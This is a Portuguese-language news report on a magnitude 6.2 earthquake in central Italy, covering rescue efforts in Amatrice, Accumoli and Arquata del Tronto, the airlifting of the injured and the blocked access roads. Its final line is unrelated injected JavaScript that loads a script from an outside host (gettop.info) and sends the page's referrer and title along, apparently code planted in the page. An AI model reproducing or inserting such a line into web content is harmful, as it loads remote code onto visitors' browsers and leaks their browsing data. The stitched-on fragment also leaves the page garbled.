Dezenas de socorristas, policiais e voluntários trabalham sem descanso nas pequenas localidades de Amatrice e Accumoli, na região do Lacio, e Arquata del Tronto, na região de Marcas, as três mais afetadas pelo terremoto, para retiras as pessoas dos escombros. As imagens exibidas pela TV são dramáticas, com imóveis que desabaram, rachaduras em prédios e casas afetadas pelo tremor.
Os feridos em estado mais grave estão sendo levados para a capital da província, Rieti, assim como para hospitais de Roma e Florença em helicópteros. O governo nacional convocou o exército para os trabalhos de resgate, que são particularmente complicados.
Muitos turistas estavam na região para participar na festa que Amatrice organiza todos os anos para celebrar a criação de uma famosa receita de spaghetti. \”Os hotéis estavam todos lotados\”, afirmou a prefeitura.
O serviço geológico dos Estados Unidos (USGS) confirmou que o tremor teve 6,2 graus de magnitude, com epicentro situado 10 km a sudeste de Nórcia, cidade da região de Úmbria, na província de Perúgia, cerca de 150 km de Roma. O abalo ocorreu às 3h30 local (22h30 Brasília), surpreendendo a população enquanto dormia.
As estradas de acesso à Amatrice, localidade de 2.600 habitantes, estão bloqueadas. \”Em uma das estradas há um deslizamento de terra e na outra caiu uma ponte\”, revelou Pirozzi. Amatrice é um povoado de montanha muito popular entre os romanos que desejam escapar do calor nos finais de semana de agosto.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;